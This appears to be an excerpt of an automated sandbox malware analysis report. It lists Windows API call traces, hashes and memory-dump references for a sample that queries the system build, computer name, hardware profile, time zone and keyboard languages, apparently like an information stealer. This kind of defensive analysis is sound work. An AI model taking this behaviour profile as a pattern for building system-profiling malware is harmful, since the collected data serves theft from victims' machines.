                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                        • String ID: Windows 11
                                                                                                                                                                        • API String ID: 3466090806-2517555085
                                                                                                                                                                        • Opcode ID: f1d4fdbf116669f5554fdd3e5737c8ef8651217cf906e4f0b4b82bb32e371113
                                                                                                                                                                        • Instruction ID: 7a427ca7ac8f4800c7a6d1821f21d27b441b7374d7bcd822c4822bb2483c620c
                                                                                                                                                                        • Opcode Fuzzy Hash: f1d4fdbf116669f5554fdd3e5737c8ef8651217cf906e4f0b4b82bb32e371113
                                                                                                                                                                        • Instruction Fuzzy Hash: 1DF0FF79641304FFEF126BA1EC4AFAE7F6DEB48B05F140165F602AA1A0D7B19940DB60
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00190BF0,00190B2D,?,?,?,00193ED5,Windows: ,001B68A8), ref: 00190B92
                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,00190BF0,00190B2D,?,?,?,00193ED5,Windows: ,001B68A8), ref: 00190B99
                                                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,001B6890,?,?,?,00190BF0,00190B2D,?,?,?,00193ED5,Windows: ,001B68A8), ref: 00190BB7
                                                                                                                                                                        • RegQueryValueExA.KERNEL32(001B6890,CurrentBuildNumber,00000000,00000000,00000000,000000FF,?,?,?,00190BF0,00190B2D,?,?,?,00193ED5,Windows: ), ref: 00190BD2
                                                                                                                                                                        • RegCloseKey.ADVAPI32(001B6890,?,?,?,00190BF0,00190B2D,?,?,?,00193ED5,Windows: ,001B68A8), ref: 00190BDB
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                        • String ID: CurrentBuildNumber
                                                                                                                                                                        • API String ID: 3466090806-1022791448
                                                                                                                                                                        • Opcode ID: b1e295de4484ce3682ab72ff3f1cc6d7fd7cd7482740744fee10a8221b524d21
                                                                                                                                                                        • Instruction ID: b4fe1734f7f7a3ddc3c0cdb56a00b849555b79b5e4bc5b8037126b258136fffe
                                                                                                                                                                        • Opcode Fuzzy Hash: b1e295de4484ce3682ab72ff3f1cc6d7fd7cd7482740744fee10a8221b524d21
                                                                                                                                                                        • Instruction Fuzzy Hash: DEF0307A641304FBFB12AB91EC4AFAE7F7DEB44B05F140155F601AA0A0D7B199409B10
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0018E72B,?,?,?), ref: 00187FC7
                                                                                                                                                                        • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0018E72B,?,?,?), ref: 00187FDE
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0018E72B,?,?,?), ref: 00187FF5
                                                                                                                                                                        • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0018E72B,?,?,?), ref: 0018800C
                                                                                                                                                                        • LocalFree.KERNEL32(0018EC91,?,?,?,?,0018E72B,?,?,?), ref: 0018802B
                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,0018E72B,?,?,?), ref: 00188034
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2311089104-0
                                                                                                                                                                        • Opcode ID: b877848f237db1f8f7fc003e79249ea23f3435d25cbe3a8afb2f4cd0b92a3e08
                                                                                                                                                                        • Instruction ID: ca5c0a3f3aeca3895c3333f0d84d48f627fc18a7e5006b888e94eb381e3fde3d
                                                                                                                                                                        • Opcode Fuzzy Hash: b877848f237db1f8f7fc003e79249ea23f3435d25cbe3a8afb2f4cd0b92a3e08
                                                                                                                                                                        • Instruction Fuzzy Hash: 62115874901204EFDF22AFA4ED88EAE7FB8EB44781F600549F851EA190DB719B85DF11
                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 00191733
                                                                                                                                                                        • CoCreateInstance.OLE32(001B31B0,00000000,00000001,001BAF60,?,00000018,001918D6,?), ref: 00191756
                                                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 00191763
                                                                                                                                                                        • _wtoi64.MSVCRT ref: 00191796
                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 001917AF
                                                                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 001917B6
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: String$Free$AllocCreateH_prolog3_catchInstance_wtoi64
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 181426013-0
                                                                                                                                                                        • Opcode ID: c74b80f3d7f63c19a5843d2d139c03d03454b16b060e54c4c6f20d0e26cf383a
                                                                                                                                                                        • Instruction ID: 33220f280da694858d8e454154c254377680326b9c55ce606bb24d24fee9b00b
                                                                                                                                                                        • Opcode Fuzzy Hash: c74b80f3d7f63c19a5843d2d139c03d03454b16b060e54c4c6f20d0e26cf383a
                                                                                                                                                                        • Instruction Fuzzy Hash: 7911197590424AEFCF059FE8C8989AEBBB6FF49310F54416DF215E7250DB318986CB60
                                                                                                                                                                        APIs
                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,001E5D70,00003000,00000004), ref: 001810AA
                                                                                                                                                                        • _memset.LIBCMT ref: 001810D0
                                                                                                                                                                        • VirtualFree.KERNEL32(00000000,001E5D70,00008000), ref: 001810E6
                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,0019850E), ref: 00181100
                                                                                                                                                                        • VirtualAllocExNuma.KERNEL32(00000000), ref: 00181107
                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00181112
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Virtual$AllocProcess$CurrentExitFreeNuma_memset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1859398019-0
                                                                                                                                                                        • Opcode ID: d8effb706a6b9e48797525c297f4d28f9039ce6b499cb6a3b657c4b074c640f5
                                                                                                                                                                        • Instruction ID: 6028f03cd4c72310d19a15e2dc7475317a1dd1a850ea5dc4a47fbf9073d75dbb
                                                                                                                                                                        • Opcode Fuzzy Hash: d8effb706a6b9e48797525c297f4d28f9039ce6b499cb6a3b657c4b074c640f5
                                                                                                                                                                        • Instruction Fuzzy Hash: 1CF0F673381324B7E22132752C5EFBB5A6CAB45FA2F204010F309FB2C0D7659A459BB4
                                                                                                                                                                        APIs
                                                                                                                                                                        • _memset.LIBCMT ref: 001916A3
                                                                                                                                                                          • Part of subcall function 001923AA: malloc.MSVCRT ref: 001923AF
                                                                                                                                                                          • Part of subcall function 001923AA: strncpy.MSVCRT ref: 001923C0
                                                                                                                                                                        • lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 001916CB
                                                                                                                                                                        • lstrcatA.KERNEL32(?,001B6ED4,?,?,?,?,?), ref: 001916E8
                                                                                                                                                                        • GetCurrentHwProfileA.ADVAPI32(?), ref: 00191674
                                                                                                                                                                          • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcat$CurrentProfile_memsetlstrcpymallocstrncpy
                                                                                                                                                                        • String ID: Unknown
                                                                                                                                                                        • API String ID: 2781187439-1654365787
                                                                                                                                                                        • Opcode ID: 52e71de14b04bd7c0a9a06e18cb66920f03f340dc8b14b45fe098532d85e6e04
                                                                                                                                                                        • Instruction ID: c9c641c6de6963628c2b086e092470495bed854a07ac2aed93c8baa44d036881
                                                                                                                                                                        • Opcode Fuzzy Hash: 52e71de14b04bd7c0a9a06e18cb66920f03f340dc8b14b45fe098532d85e6e04
                                                                                                                                                                        • Instruction Fuzzy Hash: 82112E76A00228ABDF12FB64DC85BDDB3B8AB28300F4004A6FA45E7151DB74AF848F50
                                                                                                                                                                        APIs
                                                                                                                                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,759774F0,?,0019CC33,?,0019CCC1,00000000,06400000,00000003,00000000,001975C1,.exe,001B6C64), ref: 0019BCB3
                                                                                                                                                                        • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,759774F0,?,0019CC33,?,0019CCC1,00000000,06400000,00000003,00000000), ref: 0019BCEB
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$CreatePointer
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2024441833-0
                                                                                                                                                                        • Opcode ID: 0c3a2d90382103f13b56e25044f2fe69d7926029c6aa9c8c67317950ff340161
                                                                                                                                                                        • Instruction ID: 357452fe9f3fe5667cbc782d91bfca8825e303a57c7dee2d45cb7e0394dcd6f6
                                                                                                                                                                        • Opcode Fuzzy Hash: 0c3a2d90382103f13b56e25044f2fe69d7926029c6aa9c8c67317950ff340161
                                                                                                                                                                        • Instruction Fuzzy Hash: B83194B0508B45DFDF349F65AAC4B677AE8EB1475CF108B2EF19B82980D330A884CB51
                                                                                                                                                                        APIs
                                                                                                                                                                        • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00184AE8
                                                                                                                                                                        • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00184AEE
                                                                                                                                                                        • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00184AF4
                                                                                                                                                                        • lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00184B06
                                                                                                                                                                        • InternetCrackUrlA.WININET(000000FF,00000000), ref: 00184B0E
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CrackInternetlstrlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1274457161-0
                                                                                                                                                                        • Opcode ID: 8623486b9572516f7c8f8c19fe6d49ada99dceb963f2b8d9a5204d90b1caebc0
                                                                                                                                                                        • Instruction ID: a34de3fee7b008c8b438edc91f22b8543eed7c16db92fc5f554c9bef4b6ae701
                                                                                                                                                                        • Opcode Fuzzy Hash: 8623486b9572516f7c8f8c19fe6d49ada99dceb963f2b8d9a5204d90b1caebc0
                                                                                                                                                                        • Instruction Fuzzy Hash: F5015E31D00218ABCB05ABA9EC45ADEBFB8EF55330F108216F925E72E0DB7056018F94
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00194292,Processor: ,[Hardware],001B6958,00000000,TimeZone: ,001B6948,00000000,Local Time: ,001B6934), ref: 00190F3A
                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,00194292,Processor: ,[Hardware],001B6958,00000000,TimeZone: ,001B6948,00000000,Local Time: ,001B6934,Keyboard Languages: ,001B6918), ref: 00190F41
                                                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,001B6890,?,?,?,00194292,Processor: ,[Hardware],001B6958,00000000,TimeZone: ,001B6948,00000000,Local Time: ), ref: 00190F5F
                                                                                                                                                                        • RegQueryValueExA.KERNEL32(001B6890,00000000,00000000,00000000,000000FF,?,?,?,00194292,Processor: ,[Hardware],001B6958,00000000,TimeZone: ,001B6948,00000000), ref: 00190F7B
                                                                                                                                                                        • RegCloseKey.ADVAPI32(001B6890,?,?,?,00194292,Processor: ,[Hardware],001B6958,00000000,TimeZone: ,001B6948,00000000,Local Time: ,001B6934,Keyboard Languages: ,001B6918), ref: 00190F84
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3466090806-0
                                                                                                                                                                        • Opcode ID: aad0cacb4bd7f41591c4b2db16d8328ba387db15b84bbc00d9f0170b6691b07f
                                                                                                                                                                        • Instruction ID: 380235bb6bb2f8a8c13c6a8f54e93eb05a873860c13ca6425debee51221dc7c2
                                                                                                                                                                        • Opcode Fuzzy Hash: aad0cacb4bd7f41591c4b2db16d8328ba387db15b84bbc00d9f0170b6691b07f
                                                                                                                                                                        • Instruction Fuzzy Hash: 68F03075641304FFEB126B91EC0AFAA7F7DEB44B01F140115F701A90A0D7B19A409B20
                                                                                                                                                                        APIs
                                                                                                                                                                        • Sleep.KERNEL32(000003E8,?,?), ref: 00196F40
                                                                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,00196E08,?,00000000,00000000), ref: 00196F78
                                                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00196F80
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateObjectSingleSleepThreadWait
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4198075804-0
                                                                                                                                                                        • Opcode ID: b472355484f62b0bbe4d8416573849b503e83f8f4b293f11e2bf96b9e2184377
                                                                                                                                                                        • Instruction ID: 81b7c8711d9ead2975a7c8d299fd3e6904e4754de0ae7d8befa0a3e1997129c8
                                                                                                                                                                        • Opcode Fuzzy Hash: b472355484f62b0bbe4d8416573849b503e83f8f4b293f11e2bf96b9e2184377
                                                                                                                                                                        • Instruction Fuzzy Hash: 3621E47690011DABDF02EF64EC868DEBBB8FF54354F114126F916A7151D730AE86CBA0
                                                                                                                                                                        APIs
                                                                                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,00193E2A,00000000,?), ref: 00192241
                                                                                                                                                                        • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 0019225C
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00192263
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID: CloseFileHandleModuleNameOpenProcess
• String ID:
• API String ID: 3183270410-0
• Opcode ID: da81354de6e2874130b7592a7a3ac8190e12a7915167c9259aed9dc9b47688c8
• Instruction ID: d30d64643ab4c986196bc0ffe0b8568ac311b4cb8e58119368d27bd76f208594
• Opcode Fuzzy Hash: da81354de6e2874130b7592a7a3ac8190e12a7915167c9259aed9dc9b47688c8
• Instruction Fuzzy Hash: 2DF05475604208ABDB11BB68EC45FEE7BBC9B44700F00005AF645DB190DFB4D9858B95
APIs
• GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00181385), ref: 00190C66
• HeapAlloc.KERNEL32(00000000,?,?,?,00181385), ref: 00190C6D
• GetComputerNameA.KERNEL32(00000000,00181385), ref: 00190C81
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID: Heap$AllocComputerNameProcess
• String ID:
• API String ID: 4203777966-0
• Opcode ID: 12f71ecc2a2acdaed44453049586bb971b2495d4c767c505b4f382a2fd648728
• Instruction ID: b4960d84968970b4d8d411b3ca8f477a02fbb5c2580cd6a4f14e65d7bb7fa994
• Opcode Fuzzy Hash: 12f71ecc2a2acdaed44453049586bb971b2495d4c767c505b4f382a2fd648728
• Instruction Fuzzy Hash: 62E08CB1204204BBD741AB999C4DF8F7BACDB88751F000264F605D2150E7B0C9848720
APIs
• malloc.MSVCRT ref: 0019CC0E
  • Part of subcall function 0019BBB1: lstrlenA.KERNEL32(?,0019CC1F,0019CCC1,00000000,06400000,00000003,00000000,001975C1,.exe,001B6C64,001B6C60,001B6C5C,001B6C58,001B6C54,001B6C50,001B6C4C), ref: 0019BBE3
  • Part of subcall function 0019BBB1: malloc.MSVCRT ref: 0019BBEB
  • Part of subcall function 0019BBB1: lstrcpyA.KERNEL32(00000000,?), ref: 0019BBF6
• malloc.MSVCRT ref: 0019CC4B
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID: malloc$lstrcpylstrlen
• String ID:
• API String ID: 2974738957-0
• Opcode ID: 89d838119ec0f05c8d6a381d486c9670557fc990870872295c4a7ba45ce503a4
• Instruction ID: 8d2a49b417d01331bd7ff0a647eaf628c46c60e746d95a56850cc756241835f4
• Opcode Fuzzy Hash: 89d838119ec0f05c8d6a381d486c9670557fc990870872295c4a7ba45ce503a4
• Instruction Fuzzy Hash: 72F0B4726092265BDF246F69ED8195BBFA8EB487A0F064121FE4D9B241DB30EC0087F0
